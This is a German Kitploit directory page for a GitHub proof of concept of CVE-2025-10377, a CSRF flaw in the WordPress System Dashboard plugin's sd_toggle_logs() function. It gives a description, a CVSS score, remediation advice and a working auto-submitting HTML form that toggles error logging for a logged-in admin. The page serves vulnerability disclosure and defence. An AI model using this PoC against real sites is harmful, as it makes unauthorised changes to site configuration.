Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-10377 — CVE-2025-10377 | Kitploit
Tools/GitHubGitHub/nagisayumaa/cve-2025-10377
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubnagisayumaa/cve-2025-10377

CVE-2025-10377

CVE-2025-10377

Repository anzeigen
vor 0 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Proof of Concept CVE-2025-10377 Cross-Site Request Forgery (CSRF) im Plugin System Dashboard (Funktion sd_toggle_logs)

Schwachstellentyp: Cross-Site Request Forgery (CSRF)

Betroffene Funktion: sd_toggle_logs()

CVSS v3.1: 4,3 (Medium)
Vector: AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N
(Hinweis: Der Wert spiegelt eine unbefugte Zustandsänderung wider, die ein Admin-Opfer und Benutzerinteraktion erfordert.)

Beschreibung der Schwachstelle:

Die Funktion sd_toggle_logs() verarbeitet sensible Vorgänge wie das Aktivieren/Deaktivieren von Seitenzugriffsprotokollen, Fehlerprotokollen und E-Mail-Protokollen. Sie stützt sich jedoch lediglich auf den Parameter $_REQUEST['log_type'] und eine Berechtigungsprüfung (current_user_can( 'manage_options' )), ohne CSRF-Schutz zu implementieren (z. B. check_admin_referer() oder einen Nonce).

Daher kann ein Angreifer einen eingeloggten Administrator dazu verleiten, eine bösartige Seite zu besuchen, die stillschweigend eine manipulierte Anfrage sendet und so unbeabsichtigte Aktivierungs-/Deaktivierungsänderungen an der Seitenprotokollierung verursacht.

Auswirkungen:

  • Unbefugte Zustandsänderungen für die Funktionen der Seitenprotokollierung (Seitenzugriffsprotokoll, Fehlerprotokoll, E-Mail-Protokoll).

Tool herunterladen
  • Wenn die Fehlerprotokollierung aktiviert ist, beginnt die Website möglicherweise damit, Anwendungsfehler in einen vom Plugin festgelegten Dateipfad zu schreiben (was die Chance auf betriebliche Informationsweitergabe über Protokolle erhöht), die direkte Auswirkung dieses Problems ist jedoch der Zustandswechsel selbst.

  • POC

    Wenn ein eingeloggter Benutzer mit manage_options die Angreiferseite besucht, wird die entsprechende Protokollierungsfunktion ohne ausdrückliche Zustimmung umgeschaltet.

    root@kitploit:~
     <body>
        <form action="http://victim.com/wordpress/wp-admin/admin-ajax.php">
          <input type="hidden" name="action" value="sd&#95;toggle&#95;logs" />
          <input type="hidden" name="log&#95;type" value="errors&#95;log" />
          <input type="hidden" name="fast&#95;ajax" value="true" />
          <input type="hidden" name="load&#95;plugins&#91;&#93;" value="system&#45;dashboard&#47;system&#45;dashboard&#46;php" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    

    Abhilfe

    • Implementieren Sie WordPress-Nonces (check_admin_referer() oder wp_verify_nonce()) zur Validierung von Anfragen.

    • Beschränken Sie sensible Aktionen ausschließlich auf POST-Anfragen.

    • Verlassen Sie sich nicht allein auf Berechtigungsprüfungen zum Schutz vor CSRF.

    Video-POC

    Falls Sie das Problem nicht genau wie im Bericht beschrieben reproduzieren können, sehen Sie sich bitte die folgende Videodemonstration (PoC) für ein klares Reproduktionsszenario an:

    https://youtu.be/WtWYIfEM4W0